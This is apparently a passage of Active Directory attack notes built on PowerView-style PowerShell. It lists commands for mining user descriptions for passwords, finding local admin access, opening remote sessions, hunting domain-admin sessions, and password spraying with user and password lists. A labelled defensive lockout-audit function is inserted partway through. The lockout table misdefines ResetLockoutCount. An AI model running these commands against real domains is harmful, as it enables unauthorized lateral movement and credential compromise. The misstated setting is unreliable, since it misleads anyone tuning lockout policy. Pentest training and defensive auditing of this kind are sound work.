Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "admin"
Find-UserField -SearchField Description -SearchTerm "manage"
...
- Find all machines on the current domain where the current user has local admin access (Get-NetComputer + Invoke-CheckLocalAdminAccess)
Find-LocalAdminAccess -Verbose
- Find Administrative access
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
# Not stateful (interactive session, closed on exit)
Enter-PSSession -ComputerName targetcomputer.target.domain.local
# Stateful (session object that can be reused)
$sess = New-PSSession -ComputerName targetcomputer.target.domain.local
Enter-PSSession -Session $sess
- If RPC and SMB are blocked, check with WMI
. .\Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
- Find local admins on all machines of the domain (Get-NetComputer + Get-NetLocalGroup)
Invoke-EnumerateLocalAdmin -Verbose
- Find computers where a domain admin (or specified user/group) has sessions
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
- Confirm admin access
Invoke-UserHunter -CheckAccess
- Find computers where a domain admin is logged in (Get-NetSession / Get-NetLoggedon)
Invoke-UserHunter -Stealth
- Wait (poll) for an incoming session of the given user
Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator -Delay 5 -Verbose
# CHECK THE LOCKOUT POLICY FIRST AND TAKE CARE NOT TO LOCK ACCOUNTS
(Get-DomainPolicy)."system access"
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
| Setting key | Explanation |
|---|---|
| LockoutDuration | The number of minutes that a locked-out account MUST remain locked out before automatically becoming unlocked. -1 = MUST be unlocked by an administrator; any other value = number of minutes |
| LockoutBadCount | Number of failed logon attempts after which a user account MUST be locked out. |
| ResetLockoutCount | Number of minutes after a failed logon attempt that the account MUST be locked out |
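Added example (not PowerView code): a small audit function that reads the `[System Access]` lockout keys from the table above, as returned by `(Get-DomainPolicy)."system access"`, and reports whether lockout is actually enforced. The function name `Test-LockoutPolicy` and the `$ConstructedPolicy` sample hashtable are assumptions made for this example; the only interpretation beyond the table is that a LockoutBadCount of 0 means accounts never lock out.

```powershell
# Added example, not part of PowerView. Input: the hashtable returned by
# (Get-DomainPolicy)."system access"; values come from GptTmpl.inf as strings.
function Test-LockoutPolicy {
    param([Parameter(Mandatory)][hashtable]$SystemAccess)

    # INI values arrive as strings (a missing key casts to 0).
    $badCount = [int]$SystemAccess['LockoutBadCount']
    $duration = [int]$SystemAccess['LockoutDuration']
    $reset    = [int]$SystemAccess['ResetLockoutCount']

    $findings = @()
    if ($badCount -eq 0) {
        # Windows semantics: a threshold of 0 disables account lockout entirely,
        # so floods of failed logons (password spraying) are never slowed down.
        $findings += 'LockoutBadCount = 0: lockout disabled, monitor failed logons (4625/4771) instead.'
    }
    elseif ($duration -eq -1) {
        # From the table: -1 means an administrator has to unlock the account.
        $findings += 'LockoutDuration = -1: locked accounts require manual unlock by an admin.'
    }
    else {
        $findings += "Lockout after $badCount failures for $duration minute(s)."
    }

    [pscustomobject]@{
        LockoutBadCount   = $badCount
        LockoutDuration   = $duration
        ResetLockoutCount = $reset
        LockoutEnabled    = ($badCount -gt 0)
        Findings          = $findings
    }
}

# Constructed sample (assumption): a domain whose policy never locks accounts.
$ConstructedPolicy = @{
    'LockoutBadCount'   = '0'
    'LockoutDuration'   = '30'
    'ResetLockoutCount' = '30'
}
Test-LockoutPolicy -SystemAccess $ConstructedPolicy | Format-List

# Against a live domain (requires PowerView loaded):
# Test-LockoutPolicy -SystemAccess (Get-DomainPolicy)."system access"
```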
- Use this command to see when each user's password was last set (pwdlastset) in the current domain
Get-UserProperty -Properties pwdlastset